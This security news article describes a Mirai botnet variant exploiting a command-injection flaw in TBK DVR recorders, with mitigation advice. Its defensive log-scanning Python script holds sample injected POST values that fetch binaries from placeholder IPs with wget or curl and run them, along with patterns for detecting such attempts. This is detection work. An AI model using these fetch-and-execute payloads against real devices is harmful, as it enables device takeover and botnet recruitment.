Attack

Mirai Botnet variant exploits TBK DVR Devices flaw

Take action: If you have TBK DVR devices (or rebranded versions like Novo, CeNova, QSee, Pulnix, Night OWL, etc.), make sure to isolate these devices from the internet. Then check for and apply any available firmware updates from your vendor to patch CVE-2024-3721. If the device has been exposed, consider performing a factory reset before isolating it in a protected network.


Learn More

Cybersecurity researchers are reporting a new variant of the Mirai botnet that is actively exploiting a command injection vulnerability in TBK DVR devices to build a botnet infrastructure. 

The attack exploits CVE-2024-3721 (CVSS score 6.3), which allows remote attackers to execute arbitrary operating system commands on vulnerable TBK DVR-4104 and DVR-4216 digital video recording devices without proper authorization. 

The vulnerability was originally disclosed by security researcher "netsecfish" in April 2024, who published a proof-of-concept demonstrating how attackers could achieve shell command execution through the manipulation of specific parameters in POST requests. 

Kaspersky researchers detected active exploitation of CVE-2024-3721 in their Linux honeypot systems, where they observed unusual request patterns linked to the vulnerability. The attack begins with a specially crafted POST request containing a malicious command that functions as a single-line shell script. This script downloads and executes an ARM32 binary on the compromised device, establishing communication with command and control servers to enlist the device into the botnet swarm. 
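As an added, defender-side illustration (not code from the original report or from Kaspersky), the following Python script flags the request pattern described above in honeypot or reverse-proxy request logs: a POST whose parameter value carries a shell separator chained to a download-and-execute sequence. The log format, the endpoint path, the parameter names and the IP addresses are all constructed placeholders for the example, not the real vulnerable endpoint or any observed infrastructure.

```python
"""Flag Mirai-style download-and-execute injection attempts in HTTP request logs.

Added example, not code from the original report. Log format, endpoint path,
parameter names and IP addresses are constructed placeholders.
"""
import re
from urllib.parse import parse_qs

# Constructed sample log: "<src_ip> <method> <path> <url-encoded POST body or ->"
SAMPLE_LOG = """\
10.0.0.5 POST /placeholder-dvr-endpoint user=admin&password=admin
10.0.0.7 POST /placeholder-dvr-endpoint user=admin%3Bwget+http%3A%2F%2F203.0.113.10%2Farm.bin+-O+%2Ftmp%2Fx%3Bchmod+777+%2Ftmp%2Fx%3B%2Ftmp%2Fx&password=x
10.0.0.9 GET /index.html -
10.0.0.11 POST /placeholder-dvr-endpoint cmd=%24%28curl+http%3A%2F%2F198.51.100.3%2Fbot+%7C+sh%29
"""

# Shell separators that chain an injected command onto the expected value.
# A single '&' is a legitimate query-string delimiter, so only '&&' counts.
SHELL_SEPARATORS = re.compile(r";|\|\|?|&&|`|\$\(")
# Fetch utilities commonly present on BusyBox-based embedded devices.
DOWNLOAD_TOOLS = re.compile(r"\b(wget|curl|tftp|ftpget)\b")
# Hints that the fetched file is made executable and run.
EXEC_HINTS = re.compile(r"\bchmod\b|\bsh\b|/tmp/")
URL_PATTERN = re.compile(r"https?://[^\s;&|'\"`)]+")


def parse_line(line):
    """Split one log line into its fields; return None for malformed lines."""
    parts = line.split(" ", 3)
    if len(parts) != 4:
        return None
    src, method, path, body = parts
    return {"src": src, "method": method, "path": path, "body": body}


def _param_values(body):
    """Decode each parameter value separately so '&' never reads as a shell operator."""
    return [v for vals in parse_qs(body, keep_blank_values=True).values() for v in vals]


def score_request(req):
    """Return (score, reasons): each independent injection indicator adds one point."""
    if req["method"] != "POST" or req["body"] == "-":
        return 0, []
    values = _param_values(req["body"])
    reasons = []
    for name, pattern in (("shell separator", SHELL_SEPARATORS),
                          ("download tool", DOWNLOAD_TOOLS),
                          ("execution hint", EXEC_HINTS)):
        if any(pattern.search(v) for v in values):
            reasons.append(f"{name} in POST parameter value")
    return len(reasons), reasons


def extract_urls(req):
    """Collect download URLs from parameter values; candidate block-list entries."""
    return [u for v in _param_values(req["body"]) for u in URL_PATTERN.findall(v)]


def analyze(log_text, threshold=2):
    """Return alerts for requests that hit at least `threshold` indicators."""
    alerts = []
    for line in log_text.splitlines():
        req = parse_line(line)
        if req is None:
            continue
        score, reasons = score_request(req)
        if score >= threshold:
            alerts.append({"src": req["src"], "path": req["path"],
                           "score": score, "reasons": reasons,
                           "urls": extract_urls(req)})
    return alerts


if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG):
        print(f"{alert['src']} {alert['path']} score={alert['score']} "
              f"urls={alert['urls']} ({', '.join(alert['reasons'])})")
```

The score threshold keeps a lone metacharacter in an otherwise ordinary value (a password containing `;`, say) from raising an alert on its own; it is the combination of separator, fetch utility and execution hint that characterises the one-line download-and-execute payload. The extracted URLs are the payload-hosting servers and belong on an egress block list, which is a reminder that a DVR has no business initiating outbound connections to arbitrary hosts in the first place.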

Researchers have identified between 50,000 and 114,000 internet-exposed TBK DVR devices that are potentially vulnerable to exploitation. The attack has a global reach, with infection statistics showing that the majority of compromised devices are located in China, India, Egypt, Ukraine, Russia, Turkey, and Brazil.

The vulnerability's impact is compounded by the complex branding situation surrounding TBK DVR devices. The DVR-4104 and DVR-4216 models have been extensively rebranded under multiple names, including Novo, CeNova, QSee, Pulnix, XVR 5 in 1, Securus, Night OWL, DVR Login, HVR Login, and MDVR brands. This rebranding makes it challenging to determine which devices are affected and whether security patches are available across all branded variants.

Currently, it remains unclear whether TBK Vision, the original manufacturer, has released security updates to address CVE-2024-3721. The availability of patches for affected devices is complicated by the extensive rebranding ecosystem, where different vendors may have varying update policies and timelines. 

Security experts recommend applying firmware updates if available, implementing network-level access controls and isolation to restrict remote access to DVR devices, and conducting factory resets for confirmed vulnerable and exposed systems. 
